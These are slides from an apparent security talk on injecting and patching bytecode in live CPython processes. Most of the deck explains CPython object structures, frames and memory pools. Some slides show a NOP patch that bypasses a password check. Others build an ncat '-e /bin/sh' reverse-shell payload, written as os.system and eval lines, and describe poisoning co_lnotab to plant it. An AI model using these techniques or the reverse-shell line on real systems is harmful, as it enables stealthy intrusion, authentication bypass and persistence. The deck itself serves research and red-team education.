Evolving the Process Injection: Injecting the Python bytecode



slide-1
SLIDE 1

Evolving the Process Injection

Injecting the Python bytecode

slide-2
SLIDE 2

WhoAmI

  • Red teamer at Sberbank of Russia
  • OSCP/OSCE/SLAE
slide-3
SLIDE 3

Process Injection purposes

  • Accessing/modifying in-memory data or program execution flow
  • AV evasion & anti-forensics
  • Post-exploitation & maintaining access
slide-4
SLIDE 4

Traditional Process Injection

  • Linux
    ○ strace
    ○ ptrace
    ○ SO Injection
  • Windows
    ○ DLL Injection
    ○ Process Hollowing

slide-5
SLIDE 5

Software is Evolving

  • Interpreted (and VM-based) languages keep growing in popularity, even in non-traditional areas
  • New paradigms: microservices, serverless technologies
slide-6
SLIDE 6

Evolving & Attacker Benefits

  • Injecting code for VM-based (or other interpreted) languages potentially gives our payloads all the benefits of these languages: portability, the ability to use "high-level" interfaces instead of "low-level" functions, and more
  • It is also very hard to investigate: how many people can detect and successfully reverse engineer Java or Python bytecode payloads?

slide-7
SLIDE 7

Primary Goal

  • Find a way to manipulate a running Python process to achieve the required impact on the target system (user-mode persistence, internal logic modification, and so on)
  • The approach should work at least on x86_64 Linux with CPython 3.5.3
slide-8
SLIDE 8

Python

  • Interpreted, high-level programming language
  • Object-oriented, mostly
  • Strong community, great standard library, and perfect extensibility

Note: Python itself is just a language reference; you can build your own Python engine and decide how it handles Python code: compile it to a custom bytecode, interpret it as is, or even translate it to Java bytecode and execute it on the JVM

slide-9
SLIDE 9

CPython

  • The reference implementation of Python
  • Written in C (and Python)
  • Compiles source code to bytecode and interprets it with the Python Virtual Machine (PVM)

slide-10
SLIDE 10

CPython — Compilation

1. Parse source code into a parse tree
2. Transform parse tree into an Abstract Syntax Tree
3. Transform AST into a Control Flow Graph
4. Emit bytecode based on the Control Flow Graph

slide-11
SLIDE 11

CPython — Compilation Example

>>> import dis
>>> def hello():
...     print("Hello!")
...
>>> hello
<function hello at 0x10bd210d0>
>>> hello()
Hello!
>>> hello.__code__.co_code.hex()
'740064018301010064005300'
>>> dis.dis(hello.__code__)
  2           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('Hello!')
              4 CALL_FUNCTION            1
              6 POP_TOP
              8 LOAD_CONST               0 (None)
             10 RETURN_VALUE

Compilation produces a set of Objects (e.g., CodeObject for handling bytecode) and prepares them for Interpretation in the PVM
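The same pipeline can be driven explicitly with the built-in compile() function. The snippet below is a minimal sketch: the "<example>" file name and the namespace dictionary are illustrative choices, and the exact bytes printed depend on the CPython version in use.

```python
import dis

source = 'def hello():\n    print("Hello!")\n'

# compile() runs the whole pipeline (parse, AST, CFG, bytecode emission)
# and returns the code object of the module.
module_code = compile(source, "<example>", "exec")

# Executing the module code object creates the function object.
namespace = {}
exec(module_code, namespace)
hello = namespace["hello"]

# The function's own code object carries the bytecode and its metadata.
code = hello.__code__
print(type(code).__name__)
print(code.co_name)
print(code.co_code.hex())
dis.dis(code)
```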

slide-12
SLIDE 12

CPython — Python Virtual Machine (PVM)

  • Virtual Stack Machine
    ○ Value Stack, Call Stack, and Block Stack
    ○ No registers ⇨ Short instruction list
  • Custom memory management
    ○ Huge space mapped as MAP_ANONYMOUS | MAP_PRIVATE
    ○ Arenas, Pools, and Blocks: internal memory management primitives ⇨ Small number of system malloc/free calls
  • Operates on Objects, not raw memory values
    ⇨ Keeps abstraction level high

slide-13
SLIDE 13

CPython — A Short Guide to Objects

  • Compilation and Interpretation produce a wide set of memory primitives named Objects
  • C is not Object-Oriented, therefore all Objects are described with corresponding structs
  • The PVM works with these structs, therefore we have to explore some of them to move forward

slide-14
SLIDE 14

CPython — PyObject & PyVarObject

  • Universal headers, the basis for all other Objects
  • Every pointer to a CPython Object can be cast to a PyObject*: inheritance built by hand
  • PyVarObject is just a PyObject extension that describes Objects with a variable-sized part

slide-15
SLIDE 15

PyObject — Structure

typedef struct _object {
    _PyObject_HEAD_EXTRA
    Py_ssize_t ob_refcnt;
    struct _typeobject *ob_type;
} PyObject;

slide-16
SLIDE 16

PyVarObject — Structure

typedef struct {
    PyObject ob_base;
    Py_ssize_t ob_size;
} PyVarObject;
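These header fields can be observed from inside a running interpreter with ctypes. This is only a sketch under assumptions: it relies on CPython's id() returning the object's address, on a regular (non-debug, non-free-threaded) build where _PyObject_HEAD_EXTRA is empty, and on the field order shown in the structs.

```python
import ctypes

obj = b"any object will do"
addr = id(obj)  # in CPython, id() is the address of the PyObject header

# ob_refcnt is the first field. Newer CPython versions may pack extra
# state into this word, so the value is printed but not relied upon.
refcnt = ctypes.c_ssize_t.from_address(addr).value

# ob_type follows ob_refcnt, one Py_ssize_t further on.
type_ptr = ctypes.c_void_p.from_address(
    addr + ctypes.sizeof(ctypes.c_ssize_t)
).value

print(refcnt)
print(hex(type_ptr), hex(id(type(obj))))
```

On such a build both printed addresses match, because ob_type points at the bytes type object.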

slide-17
SLIDE 17

CPython — Types

  • Every Object in CPython has its own Type, specified by the PyObject.ob_type field
  • Types are Objects too: instances of the PyTypeObject struct
  • Type Objects are a fundamental part of CPython, describing the functionality and behavior of Objects
  • Some examples:
    ○ PyUnicodeObject.ob_type → PyUnicode_Type
    ○ PyBytesObject.ob_type → PyBytes_Type
    ○ PyCodeObject.ob_type → PyCode_Type

slide-18
SLIDE 18

CPython — The Type for Types

  • Every Type Object is a PyObject, therefore it has the ob_type field:
    ○ PyUnicode_Type.ob_type → PyType_Type
    ○ PyBytes_Type.ob_type → PyType_Type
    ○ PyCode_Type.ob_type → PyType_Type
  • But PyType_Type is a PyObject too:
    ○ PyType_Type.ob_type → PyType_Type
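The same chain is visible at the Python level, where type() returns the object that ob_type points to. A short sketch (the function f exists only to obtain a code object):

```python
def f():
    pass

# Instances point at their Type Objects.
print(type("text"), type(b"raw"), type(f.__code__))

# Type Objects point at PyType_Type, exposed in Python as `type`.
print(type(str), type(bytes), type(type(f.__code__)))

# PyType_Type points at itself, which closes the chain.
print(type(type) is type)
```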

slide-19
SLIDE 19

PyTypeObject — Structure

typedef struct _typeobject {
    PyObject_VAR_HEAD
    const char *tp_name;
    Py_ssize_t tp_basicsize, tp_itemsize;
    ...
} PyTypeObject;

slide-20
SLIDE 20

A Short Guide to Objects — Subtotals

  • We already know the structure of PyObject and PyTypeObject instances, which are comparatively low-level structures.
  • There is still no place to inject CPython bytecode.
  • Let's check the Object that works with CPython bytecode itself: PyCodeObject.

slide-21
SLIDE 21

CPython — PyCodeObject

  • PyCodeObject: a PyObject extension that describes pieces of static code.
  • PyCodeObject.ob_type → PyCode_Type
  • PyCodeObject is NOT a run-time primitive, it stores only static information about bytecode:
    ○ PyUnicodeObject* co_name: the code name (e.g., function name, <stdin>)
    ○ PyBytesObject* co_code: the opcode sequence
    ○ PyTupleObject* co_consts: the constants used

slide-22
SLIDE 22

PyCodeObject — Example

>>> def hello():
...     print("Hello!")
...
>>> hello.__code__.co_name
'hello'
>>> hello.__code__.co_code
b't\x00d\x01\x83\x01\x01\x00d\x00S\x00'
>>> hello.__code__.co_consts
(None, 'Hello!')

slide-23
SLIDE 23

PyCodeObject — Structure

typedef struct {
    PyObject_HEAD
    ...
    PyObject *co_code;
    PyObject *co_filename;
    PyObject *co_name;
    ...
} PyCodeObject;

slide-24
SLIDE 24

PyCodeObject — Points of Interest

  • Controlling a PyCodeObject allows us to play with member fields and pointers like co_code and co_consts
  • Changing the co_code (ob_type → PyBytes_Type) field gives us the ability to change existing bytecode or inject new bytecode
  • Playing with the co_consts (ob_type → PyTuple_Type) field allows us to add some data to our injection
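The effect of swapping co_consts can be previewed from inside the interpreter, without touching raw memory. The sketch below is an in-process analogue, not the external injection itself; it assumes Python 3.8 or newer for code.replace(), and the greet function is a made-up example.

```python
def greet():
    return "Hello!"

old_code = greet.__code__

# Build a new constants tuple with one value swapped. The bytecode still
# refers to the same index, so it now loads the new value.
new_consts = tuple(
    "Patched!" if const == "Hello!" else const
    for const in old_code.co_consts
)

# Code objects are immutable at the Python level, so a modified copy is
# created and attached to the function.
greet.__code__ = old_code.replace(co_consts=new_consts)

print(greet())
```

The bytecode in co_code is unchanged; only the data it refers to is different.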

slide-25
SLIDE 25

CPython — PyBytesObject

  • PyBytesObject: a PyVarObject extension that describes byte sequences
  • PyBytesObject.ob_type → PyBytes_Type
  • Just a container for a byte sequence
slide-26
SLIDE 26

PyBytesObject — Structure

typedef struct {
    PyObject_VAR_HEAD
    Py_hash_t ob_shash;
    char ob_sval[1];
} PyBytesObject;
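The layout above can be checked against a live bytes object with ctypes. This sketch assumes a regular CPython build and derives the offsets from the interpreter instead of hard-coding them: object.__basicsize__ is taken as sizeof(PyObject), and bytes.__basicsize__ as the offset of ob_sval plus one byte for the trailing NUL.

```python
import ctypes

data = b"t\x00d\x01\x83\x01"
addr = id(data)  # address of the PyBytesObject in CPython

# ob_size is the first field after the PyObject header.
ob_size = ctypes.c_ssize_t.from_address(addr + object.__basicsize__).value

# ob_sval starts one byte before the end of the fixed-size part.
sval_offset = bytes.__basicsize__ - 1
raw = ctypes.string_at(addr + sval_offset, ob_size)

print(ob_size, sval_offset, raw)
```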

slide-27
SLIDE 27

CPython — PyTupleObject

  • PyTupleObject: a PyVarObject extension that describes immutable arrays of object references
  • PyTupleObject.ob_type → PyTuple_Type
  • Just a container for object references
slide-28
SLIDE 28

PyTupleObject — Structure

typedef struct {
    PyObject_VAR_HEAD
    PyObject *ob_item[1];
} PyTupleObject;

slide-29
SLIDE 29

A Short Guide to Objects — Conclusion

  • Gaining control over a PyCodeObject and the corresponding low-level structures allows us to patch bytecode, inject values and do other things in the Virtual Memory
  • The main question: how can we find the necessary PyCodeObject?
slide-30
SLIDE 30

Finding PyCodeObject

The main approach: unraveling pointer chains

  • with a known code name: targeted impact
    ○ Code name ⇨ PyUnicodeObject ⇨ PyCodeObject.co_name
  • with a Symbol Table lookup: requires access to the Python binary
    ○ PyCode_Type (from Symbol Table) ⇨ PyCodeObject.ob_type
  • with PyType_Type: potentially gives us access to all Objects
    ○ “type\x00” ⇨ PyType_Type ⇨ PyCode_Type ⇨ PyCodeObject.ob_type
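One step of such a chain, going from a known string to the pointers that reference its object, can be sketched on a synthetic buffer. Everything here is hypothetical: the base address, the offsets, and the 48-byte header assumed in front of the string data are illustrative values, and a real search would run over the memory of the target process.

```python
import struct

def find_all(haystack, needle):
    """Yield every offset at which needle occurs in haystack."""
    pos = haystack.find(needle)
    while pos != -1:
        yield pos
        pos = haystack.find(needle, pos + 1)

def find_pointers_to(memory, base, target_addr):
    """Return addresses of 8-byte-aligned pointers equal to target_addr."""
    packed = struct.pack("<Q", target_addr)  # little-endian 64-bit pointer
    return [base + off for off in find_all(memory, packed) if off % 8 == 0]

# Synthetic "memory dump" (hypothetical layout, not a real CPython heap).
BASE = 0x7F0000000000
HEADER_SIZE = 48            # assumed size of the header before the characters
buf = bytearray(256)

name = b"check_password\x00"
buf[0x70:0x70 + len(name)] = name                # characters of a fake string object at 0x40
struct.pack_into("<Q", buf, 0xB8, BASE + 0x40)   # a fake co_name field pointing at it
memory = bytes(buf)

# Step 1: code name => address of the object that owns the string.
string_offset = next(find_all(memory, name))
unicode_addr = BASE + string_offset - HEADER_SIZE

# Step 2: object address => locations holding a pointer to it.
refs = find_pointers_to(memory, BASE, unicode_addr)
print(hex(unicode_addr), [hex(r) for r in refs])
```

Each hit is a candidate field; checking the candidate's own ob_type pointer is what would confirm that it belongs to a PyCodeObject.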

slide-31
SLIDE 31

PyCodeObject.co_code Patching

  • Once the PyCodeObject is located, we can continue our work
  • Let's try to patch existing bytecode and see how we can use that
slide-32
SLIDE 32

PyCodeObject.co_code Patching — Example

def check_password(password):
    if password == "P@ssw0rd":
        return True
    else:
        return False

  • An old-school example — patching the “if-then-else” construction

# bytecode: 7c00006401006b0200721000640200536403005364000053

slide-33
SLIDE 33

PyCodeObject.co_code Patching — Example

  • Will use NOP instruction with 0x09 opcode

# bytecode[9:12] = b"\x09\x09\x09"
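The patch can be replayed offline on the hex string from the previous slide. The decoder below is a minimal sketch for the pre-3.6 instruction format only (one opcode byte, plus a 2-byte little-endian argument for opcodes of 90 and above); its opcode table covers just the instructions that occur in this example.

```python
# Opcode numbers for the few CPython 3.5 instructions used in this example.
OPNAMES = {
    0x09: "NOP", 0x53: "RETURN_VALUE", 0x64: "LOAD_CONST",
    0x6B: "COMPARE_OP", 0x72: "POP_JUMP_IF_FALSE", 0x7C: "LOAD_FAST",
}
HAVE_ARGUMENT = 90  # opcodes >= 90 carry a 2-byte argument in CPython 3.5

def decode_35(bytecode):
    """Decode pre-3.6 bytecode into (offset, name, arg) tuples."""
    out, i = [], 0
    while i < len(bytecode):
        op = bytecode[i]
        if op >= HAVE_ARGUMENT:
            arg = bytecode[i + 1] | (bytecode[i + 2] << 8)
            out.append((i, OPNAMES[op], arg))
            i += 3
        else:
            out.append((i, OPNAMES[op], None))
            i += 1
    return out

original = bytes.fromhex("7c00006401006b0200721000640200536403005364000053")
patched = bytearray(original)
patched[9:12] = b"\x09\x09\x09"  # overwrite POP_JUMP_IF_FALSE 16 with three NOPs

for offset, name, arg in decode_35(bytes(patched)):
    print(offset, name, "" if arg is None else arg)
```

With the conditional jump gone, execution falls through to the LOAD_CONST 2 / RETURN_VALUE pair at offset 12, so the function takes the "return True" branch for any password.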

slide-34
SLIDE 34

PyCodeObject.co_code Patching — The Problem

  • Patching bytecode while it is being executed may crash the application
  • PyCodeObject is not a run-time primitive, so it has no flag that shows whether the Object is currently executing
  • But this flag exists in PyFrameObject
slide-35
SLIDE 35

CPython — PyFrameObject

  • PyFrameObject: a PyVarObject extension that describes a Call Stack Frame
  • PyFrameObject.ob_type → PyFrame_Type
  • PyFrameObject is a dynamic object created during Interpretation; it stores the arguments of a function call and otherwise behaves like a traditional stack frame

slide-36
SLIDE 36

PyFrameObject — Structure

typedef struct _frame {
    PyObject_VAR_HEAD
    struct _frame *f_back;      /* previous frame, or NULL */
    PyCodeObject *f_code;       /* code segment */
    ...
    PyObject *f_locals;         /* local symbol table (any mapping) */
    ...
    PyObject *f_localsplus[1];  /* locals+stack, dynamically sized */
} PyFrameObject;

slide-37
SLIDE 37

The Problem — Solution

  • Enumerate all PyFrameObjects whose f_code field points to the PyCodeObject we are going to patch and check the PyFrameObject.f_executing flag
  • If none of these PyFrameObjects is executing, patch the bytecode
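An in-process analogue of this check can be written with sys._current_frames(). It is a sketch, not the external technique: f_executing is not exposed to Python code, so the helper below (a hypothetical name) walks every thread's frame chain through f_back and treats any frame that references the code object as "in use", which is a stricter condition.

```python
import sys

def is_code_on_any_stack(code):
    """Return True if any live frame in any thread references `code`."""
    for frame in sys._current_frames().values():
        # Each value is the topmost frame of one thread; follow f_back
        # down to the bottom of that thread's call stack.
        while frame is not None:
            if frame.f_code is code:
                return True
            frame = frame.f_back
    return False

def target():
    # While target() runs, its own frame is on the current thread's stack.
    return is_code_on_any_stack(target.__code__)

print(target())                                # checked during execution
print(is_code_on_any_stack(target.__code__))   # checked after it returned
```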
slide-38
SLIDE 38

Demo #1

slide-39
SLIDE 39

From Patching to Injection

  • The simplest way to extend patching to injection will not work: if we try to append opcodes to existing bytecode, we will crash the application
  • Moreover, we still don't know how to add data to our payload
  • The key to Injection is the ability to construct the necessary objects and embed them into the CPython memory structure and program flow

slide-40
SLIDE 40

CPython — Memory Blocks

  • The “bytes” object is Immutable
slide-41
SLIDE 41

CPython — Memory Model

  • Custom memory manager built on top of the system allocator: PyMalloc
  • PyMalloc operates on a set of primitives: Blocks, Pools, and Arenas
  • Garbage collection based on Reference Counting (PyObject.ob_refcnt)
slide-42
SLIDE 42

Controlling the Pool

  • The Pool concept is the most interesting for us.
  • Each Pool has a Pool Header that stores some juicy info, like the list of free blocks released by the Garbage Collector
  • The Pool Header address is a multiple of 4096, therefore it is easy to obtain from the known address of an Object (and the corresponding Block) that lies inside this Pool
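Since every Pool starts on a 4096-byte boundary, the header address is the object address with its low 12 bits cleared. A minimal sketch, using the pool size stated above and a made-up object address:

```python
POOL_SIZE = 4096  # pool size as stated above

def pool_header_address(object_address):
    """Round an address down to the start of its enclosing pool."""
    return object_address & ~(POOL_SIZE - 1)

addr = 0x7F3A1C2D5E90  # hypothetical address of an object inside a pool
print(hex(pool_header_address(addr)))  # → 0x7f3a1c2d5000
```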

slide-43
SLIDE 43

pool_header — Structure

struct pool_header {
    union { block *_padding;
            uint count; } ref;          /* number of allocated blocks */
    block *freeblock;                   /* pool's free list head */
    struct pool_header *nextpool;       /* next pool of this size class */
    struct pool_header *prevpool;       /* previous pool "" */
    ...
    uint nextoffset;                    /* bytes to virgin block */
    uint maxnextoffset;                 /* largest valid nextoffset */
};

slide-44
SLIDE 44

pool_header — Structure

slide-45
SLIDE 45

Injection — Memory Allocation Strategy

  • We know the PyCodeObject address, so we can obtain the address of the current Pool Header
  • If there are blocks in the free blocks list, shorten the list and take some blocks for the injected data (it is better to take Blocks from the middle of the list)
  • If not, check the previous or next Pool Header
slide-46
SLIDE 46

Injection — Payload

  • Now we can create our own Objects and embed them into the CPython memory layout
  • Let's develop a simple nc-based reverse shell payload and inject it into existing code

slide-47
SLIDE 47

Payload — Balancing Code and Data

def shell_1():
    import os
    os.system('ncat 127.0.0.1 8081 -e /bin/sh &')

def shell_2():
    eval("__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')")

shell_1 bytecode:

     0 LOAD_CONST     1 (0)
     2 LOAD_CONST     0 (None)
     4 IMPORT_NAME    0 (os)
     6 STORE_FAST     0 (os)
     8 LOAD_FAST      0 (os)
    10 LOAD_METHOD    1 (system)
    12 LOAD_CONST     2 ('ncat 127.0.0.1 8081 ...')
    14 CALL_METHOD    1
    16 POP_TOP
    18 LOAD_CONST     0 (None)
    20 RETURN_VALUE

shell_2 bytecode:

     0 LOAD_GLOBAL    0 (eval)
     2 LOAD_CONST     1 ("__import__('os') ...")
     4 CALL_FUNCTION  1
     6 POP_TOP
     8 LOAD_CONST     0 (None)
    10 RETURN_VALUE

slide-48
SLIDE 48

Payload — Explanation

 0 LOAD_GLOBAL 0 (eval)
    Pushes the 0th element of co_names onto the Stack
    >>> shell_2.__code__.co_names
    ('eval',)

 2 LOAD_CONST 1 ("__import__('os') ...")
    Pushes the 1st element of co_consts onto the Stack
    >>> shell_2.__code__.co_consts
    (None, "__import__('os').system('ncat 127.0.0.1 8081 -e /bin/sh &')")

 4 CALL_FUNCTION 1
 6 POP_TOP
    Calls the eval function and pops the result (really, who cares about the result?)

 8 LOAD_CONST 0 (None)
10 RETURN_VALUE
    Loads the 0th element of co_consts (None) and returns it as the result of our function; the least necessary part of our payload

slide-49
SLIDE 49

Injection — Battle Plan

  • Create the raw values for the following Objects
    ○ PyUnicodeObjects: for the “eval” and “__import__('os').system('...')” strings
    ○ PyTupleObjects: for the new PyCodeObject.co_names and co_consts tuples
    ○ PyBytesObject: for the patched PyCodeObject.co_code bytecode containing the injection itself
  • Find suitable free blocks and inject these raw values into these blocks
  • Provide the PyCodeObject with the new addresses of co_names, co_consts and co_code
  • The plan is good, but it will crash the application without one simple detail
slide-50
SLIDE 50

PyCodeObject.co_lnotab

  • Stores the mapping from bytecode offsets to line numbers
  • A sequence of byte pairs: (bytecode offset increment, corresponding source line increment)

def hello():
    print("hello!")
    print("world!")
    return True

>>> dis.dis(hello)
  2           0 LOAD_GLOBAL              0 (print)
              2 LOAD_CONST               1 ('hello!')
              4 CALL_FUNCTION            1
              6 POP_TOP

  3           8 LOAD_GLOBAL              0 (print)
             10 LOAD_CONST               2 ('world!')
             12 CALL_FUNCTION            1
             14 POP_TOP

  4          16 LOAD_CONST               3 (True)
             18 RETURN_VALUE
>>> hello.__code__.co_lnotab
b'\x00\x01\x08\x01\x08\x01'
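The table can be expanded by accumulating both increments. The helper below is a minimal sketch with a hypothetical name; it treats both bytes of each pair as unsigned, which is enough for this example, and takes the line of the def statement as first_line.

```python
def decode_lnotab(lnotab, first_line):
    """Expand (offset increment, line increment) pairs into (offset, line)."""
    offset, line, table = 0, first_line, []
    for offset_inc, line_inc in zip(lnotab[0::2], lnotab[1::2]):
        offset += offset_inc
        line += line_inc
        table.append((offset, line))
    return table

# hello() is defined on line 1, so first_line is 1.
print(decode_lnotab(b"\x00\x01\x08\x01\x08\x01", first_line=1))
# → [(0, 2), (8, 3), (16, 4)]
```

The result matches the disassembly: offsets 0, 8 and 16 start source lines 2, 3 and 4.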

slide-51
SLIDE 51

PyCodeObject.co_lnotab Poisoning

  • Poisoning co_lnotab with the value “\x00\x01” allows us to inject any payload
  • We just need to create a PyBytesObject with this value and change the PyCodeObject.co_lnotab pointer
  • After that, we are ready to inject our payload
slide-52
SLIDE 52

Demo #2

slide-53
SLIDE 53

Conclusion

  • Controlling the PyCodeObject is the first step of bytecode Patching or Injection
  • Common memory patching techniques (e.g., patching “if-then-else” statements) work well for CPython

slide-54
SLIDE 54

Thanks!